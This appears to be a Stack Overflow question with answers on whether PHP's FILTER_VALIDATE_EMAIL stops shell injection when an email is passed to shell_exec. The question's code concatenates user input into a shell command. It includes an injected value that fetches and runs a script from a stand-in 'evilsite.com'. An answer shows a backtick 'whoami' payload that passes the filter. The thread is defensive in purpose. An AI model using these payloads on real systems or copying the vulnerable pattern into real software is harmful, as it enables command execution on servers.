# Is FILTER_VALIDATE_EMAIL sufficient to stop shell injection?

Tags: php, code-injection, shell-exec

So I'm planning on using `shell_exec()` to handle running a php script that sends an email.

It's all working great, but I was just slightly concerned about the security implications of only using `FILTER_VALIDATE_EMAIL` to ensure injection can't occur.

So, for example, I will be using something simlilar to this:

```
$email=$_POST['email'];
if(!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    echo 'Nope ...';
} else {
    shell_exec("/usr/bin/php /var/www/mysite/includes/sendemail '" . $email . "'" > /dev/null 2>/dev/null &);
}
```

So, obviously without the validation, I could submit my email as something like:

```
'; wget -O ./evil.sh http://evilsite.com/evilscript; ./evil.sh; '
```

and all hell could break loose ...

Is this 100% injection proof (That we know of) or is there something else I should add?

Answer (score 4):

The FILTER_VALIDATE_EMAIL implementation is based on [Michael Rushton’s *Email Address Validation*](http://squiloople.com/2009/12/20/email-address-validation/), which validates the input using the [RFC 5321](https://www.rfc-editor.org/rfc/rfc5321), i. e., the [*Mailbox* production rule](https://www.rfc-editor.org/rfc/rfc5321#section-4.1.2).

Those email addresses are more extensive than those that are used in practice. For example, RFC 5321 allows quoted strings in the *Local-part* like `"…"@example.com`.

This allows to inject arbitrary commands, for example:

```
"'`whoami`'"@example.com
```

This would end up in your shell command as:

```
/usr/bin/php /var/www/mysite/includes/sendemail '"'`whoami`'"@example.com' > /dev/null 2>/dev/null &
```

The resulting `sendmail` parameter value would be the result of `whoami` quoted, like `"markus"@example.com`.

You see that FILTER_VALIDATE_EMAIL is simply not suited for validating shell arguments as it’s was not meant to be.

Use functions that are meant for escaping shell arguments instead like [`escapeshellarg`](http://php.net/escapeshellarg) for escaping single arguments or [`escapeshellcmd`](http://php.net/escapeshellcmd) for arbitrary arguments.

Generally, you should avoid shell commands if you can achieve the same with built-in PHP features because even [`escapeshellarg` is not free of bugs](https://bugs.php.net/search.php?search_for=escapeshellarg&limit=30&order_by=ts1&direction=DESC&cmd=display&status=All&bug_type=All&project=PHP).

Answer (score 1):

> Is this 100% injection proof (That we know of) or is there something else I should add?

The same question was asked of databases here: [Does FILTER_VALIDATE_EMAIL make a string safe for insertion in database?](https://stackoverflow.com/a/4154711/4942209)

If `filter_var($var, FILTER_VALIDATE_EMAIL)` isn't safe for databases, it's probably not safe enough for the command line.

If you did need to escape a string for use in the shell, use [`escapeshellarg()`](http://php.net/manual/en/function.escapeshellarg.php) or [`escapeshellcmd()`](http://php.net/manual/en/function.escapeshellcmd.php) like in the answers to [Filter var for calling a shellscript with system on php](https://stackoverflow.com/q/9838924/4942209). Be sure to read the API docs for those on the PHP site.

But first, you should [do some research on OWASP](https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet#Shell_Injection) to learn about best practices for application security.

> Escaping and any other countermeasures are ineffective, there are plenty of vectors for bypassing each and every one of them; don't believe what novice developers tell you.

You can avoid this problem altogether by writing the email to a temporary file, then instructing your `sendemail` application to read from the file (if it can).

Or, if it's available with your hosting configuration, you can use PHP's [`mail()`](http://php.net/manual/en/function.mail.php) method - see [How to send an email using PHP?](https://stackoverflow.com/a/5335311/4942209)

Continue to be security minded, though. [PHP's mail(): What are potential issues to watch out for?](https://stackoverflow.com/q/4834337/4942209)

Comment: Ah thank you. I think the `escapeshellarg()` function best suits my needs here. And thanks for the OWASP reference, a nice bit of night time reading :D ... Also, I don't use `mail()` because I use multiple remote mail servers, so I find it easier to just open a tls socket to the relevant server and send 'til my hearts content.

Comment: Glad it helped! Passing any user-generated content via shell commands is dangerous.. I'd really suggest sidestepping the security issue by writing the email content to a file and passing the filename to your script.